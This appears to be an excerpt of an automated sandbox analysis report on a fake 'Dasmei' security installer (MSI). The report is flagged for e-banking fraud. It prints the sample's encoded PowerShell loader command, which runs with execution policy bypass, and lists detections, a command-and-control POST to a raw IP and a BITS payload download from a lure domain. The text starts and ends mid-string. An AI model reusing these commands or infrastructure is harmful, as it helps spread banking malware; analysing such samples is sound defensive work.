GMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQ
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQ
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6368, ProcessName: svchost.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: C:\Nvidia-59226\Nvidia-59226.exe (copy)ReversingLabs: Detection: 23%
    Source: C:\Nvidia-59226\play.exeReversingLabs: Detection: 23%
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeReversingLabs: Detection: 26%
    Source: C:\Users\user\AppData\Local\Temp\psexec.exeReversingLabs: Detection: 26%
    Source: cB1ItKbbhY.msiReversingLabs: Detection: 23%
    Source: cB1ItKbbhY.msiVirustotal: Detection: 8%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.6% probability
    Source: C:\Users\user\AppData\Local\Temp\psexec.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeJoe Sandbox ML: detected
    Source: unknownHTTPS traffic detected: 34.95.215.169:443 -> 192.168.2.6:49723 version: TLS 1.2
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb- source: cB1ItKbbhY.msi, MSI2B5B.tmp.2.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: MSI2EE6.tmp, 00000004.00000000.2147031247.0000000000B1E000.00000002.00000001.01000000.00000003.sdmp, MSI2EE6.tmp, 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmp, cB1ItKbbhY.msi, MSI2B5B.tmp.2.dr
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Nvidia-59226.exe, 00000012.00000002.2669622576.00000000058A1000.00000020.10000000.00040000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: cB1ItKbbhY.msi
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: cB1ItKbbhY.msi, MSI28E4.tmp.2.dr, MSI29A1.tmp.2.dr, MSI29C1.tmp.2.dr, MSI2971.tmp.2.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSI2EE6.tmp, 00000004.00000000.2147031247.0000000000B1E000.00000002.00000001.01000000.00000003.sdmp, MSI2EE6.tmp, 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmp, cB1ItKbbhY.msi, MSI2B5B.tmp.2.dr
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Nvidia-59226.exe, 00000012.00000002.2669622576.00000000058A1000.00000020.10000000.00040000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb source: cB1ItKbbhY.msi, MSI2B5B.tmp.2.dr
    Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
    Source: C:\Windows\System32\svchost.exeFile opened: c:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B10B80 FindFirstFileExW,4_2_00B10B80
    Source: Joe Sandbox ViewIP Address: 23.94.207.151 23.94.207.151
    Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: global trafficHTTP traffic detected: POST /avs_pro/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 135Host: 23.94.207.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /notafiscal/download/cat.zip HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Wed, 18 Dec 2024 07:18:28 GMTUser-Agent: Microsoft BITS/7.8Host: site.webmailcontabilidadecrx.net
    Source: global trafficDNS traffic detected: DNS query: site.webmailcontabilidadecrx.net
    Source: unknownHTTP traffic detected: POST /avs_pro/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 135Host: 23.94.207.151
    Source: Nvidia-59226.exe, 0000000F.00000003.3129298416.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3128167457.0000000001C6D000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127591156.0000000001C6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.207.151/
    Source: Nvidia-59226.exe, 0000000F.00000003.3127866479.0000000001C3D000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127988025.0000000001C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.207.151/avs_pro/index.php
    Source: Nvidia-59226.exe, 0000000F.00000003.3129298416.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3128167457.0000000001C6D000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127591156.0000000001C6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.207.151/l
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0(
    Source: powershell.exe, 00000006.00000002.4663952431.000001AC7BA31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoO
    Source: svchost.exe, 0000000A.00000002.3667611038.00000207B2600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: edb.log.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: powershell.exe, 00000006.00000002.4647536706.000001AC10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: Nvidia-59226.exe, 00000012.00000003.2647445335.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, Nvidia-59226.exe, 00000012.00000002.2651388634.000000000202B000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
    Source: powershell.exe, 00000006.00000002.4667551745.000001AC7BD30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
    Source: powershell.exe, 00000006.00000002.4667136687.000001AC7BBB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coE
    Source: cB1ItKbbhY.msiString found in binary or memory: https://Dasmei-security.com/supportButtonText_Yes&SimARPCOMMENTSA
    Source: cB1ItKbbhY.msiString found in binary or memory: https://Dasmei-security.com/updateWindowsTypeNT60DisplayPROMPTROLLBACKCOSTPAppsShutdownOptionAllLIMI
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000006.00000002.4647536706.000001AC10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.4647536706.000001AC10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.4647536706.000001AC10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: edb.log.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
    Source: svchost.exe, 0000000A.00000003.2216112517.00000207B23C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000006.00000002.4647536706.000001AC10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: svchost.exe, 0000000A.00000002.3667611038.00000207B2600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net/
    Source: svchost.exe, 0000000A.00000002.3667961922.00000207B2685000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.3664754989.00000207B2530000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.3664723824.00000207B2930000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.2461279752.00000207B23C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.2301431171.00000207B23C4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.3666041143.00000207AD704000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.3665608499.00000207ADC40000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.2279087944.00000207B23C1000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drString found in binary or memory: https://site.webmailcontabilidadecrx.net/notafiscal/download/cat.zip
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net/notafiscal/receive_info.php
    Source: svchost.exe, 0000000A.00000002.3667961922.00000207B2662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3667961922.00000207B26B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net:443/notafiscal/download/cat.zip
    Source: powershell.exe, 00000006.00000002.4592389072.000001AC0323B000.00000004.00000800.00020000.00000000.sdmp, cB1ItKbbhY.msi, psexec.exe.3.dr, play.exe.6.dr, psexec.exe.2.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownHTTPS traffic detected: 34.95.215.169:443 -> 192.168.2.6:49723 version: TLS 1.2

    E-Banking Fraud

    barindex
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAH